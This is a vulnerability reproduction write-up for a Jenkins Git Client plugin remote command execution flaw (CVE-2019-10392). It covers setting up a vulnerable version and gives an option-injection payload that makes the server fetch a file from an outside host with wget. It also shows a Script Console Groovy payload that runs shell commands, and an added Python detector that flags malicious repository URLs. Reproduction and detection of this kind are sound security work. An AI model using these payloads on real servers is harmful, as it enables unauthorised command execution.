
CVE-2019-10392 / Jenkins Git Client Plugin Remote Command Execution: Vulnerability Reproduction

Environment setup

Install Jenkins with rpm -i jenkins-2.150.3-1.1.noarch.rpm
Start Jenkins with service jenkins start

Then visit http://ip:8080 to run the setup wizard.

During setup, be sure to choose "Select plugins to install".

(Figure: selecting plugins to install)

Remove Git Client from the list of plugins to be installed.

(Figure: unchecking the Git plugin)

If you do not remove it, Jenkins will install the latest Git plugin and the vulnerability cannot be reproduced.

(Figure: waiting for installation)

Then wait for the selected plugins to finish installing.

Upload the plugin

(Figure: local plugin installation)

  • 3. Restart Jenkins: service jenkins restart

Payload

  • 1. Create a new project: visit http://ip:8080/view/all/newJob, enter a project name and click OK.

(Figure: new project)

  • 2. RCE: in the field marked by the red box, enter --upload-pack=wget http://ip:port/1.txt to request an arbitrary remote file.

(Figure: the red box)

The server will then receive the connection request.

(Figure: incoming connection request)
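As an added defender-side example (not part of the original write-up): the payload above works because the repository URL field is handed to git, which reads a value beginning with "-" as an option rather than a remote. The check below scans a Jenkins job's config.xml for repository URLs of that shape; the Git plugin element names (hudson.plugins.git.UserRemoteConfig/url) and the sample job config are assumptions/constructed data.

```python
"""Flag Jenkins Git SCM repository URLs that git would parse as options
(the "--upload-pack=..." shape of the CVE-2019-10392 payload).

Added example, not from the original article. The Git plugin's config.xml
layout (hudson.plugins.git.UserRemoteConfig/url) and the sample job config
below are assumptions/constructed data.
"""
import xml.etree.ElementTree as ET

# Constructed sample job config: one legitimate remote, one injection attempt.
SAMPLE_CONFIG_XML = """<project>
  <scm class="hudson.plugins.git.GitSCM">
    <userRemoteConfigs>
      <hudson.plugins.git.UserRemoteConfig>
        <url>https://git.example.invalid/team/app.git</url>
      </hudson.plugins.git.UserRemoteConfig>
      <hudson.plugins.git.UserRemoteConfig>
        <url> --upload-pack=wget http://ip:port/1.txt</url>
      </hudson.plugins.git.UserRemoteConfig>
    </userRemoteConfigs>
  </scm>
</project>
"""


def is_option_like(url: str) -> bool:
    """True if git would treat this 'URL' as a command-line option.

    git parses a leading '-' as an option, so such a value never reaches
    the remote-URL code path; this is the validation the affected plugin
    versions lacked.
    """
    return url.strip().startswith("-")


def find_option_injection(config_xml: str) -> list:
    """Return every Git remote URL in a job config.xml that looks like an option."""
    root = ET.fromstring(config_xml)
    hits = []
    for remote in root.iter("hudson.plugins.git.UserRemoteConfig"):
        url_el = remote.find("url")
        if url_el is not None and is_option_like(url_el.text or ""):
            hits.append(url_el.text.strip())
    return hits


if __name__ == "__main__":
    for hit in find_option_injection(SAMPLE_CONFIG_XML):
        print("suspicious repository URL:", hit)
```

Run it against each job's config.xml under JENKINS_HOME/jobs/ (or wire the same check into a pre-save validation) to catch option-shaped remotes before git ever sees them.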

That completes the reproduction. The vulnerability can only be triggered after logging in and requires the Git Client plugin to be installed, which makes it rather limited. In fact, the Jenkins back end has long had a vulnerability that echoes command output back directly.

Visit http://ip:8080/script

(Figure: Script Console)

Enter the following payload and click Run:

println("ifconfig".execute().getText())

(Figure: ifconfig output)
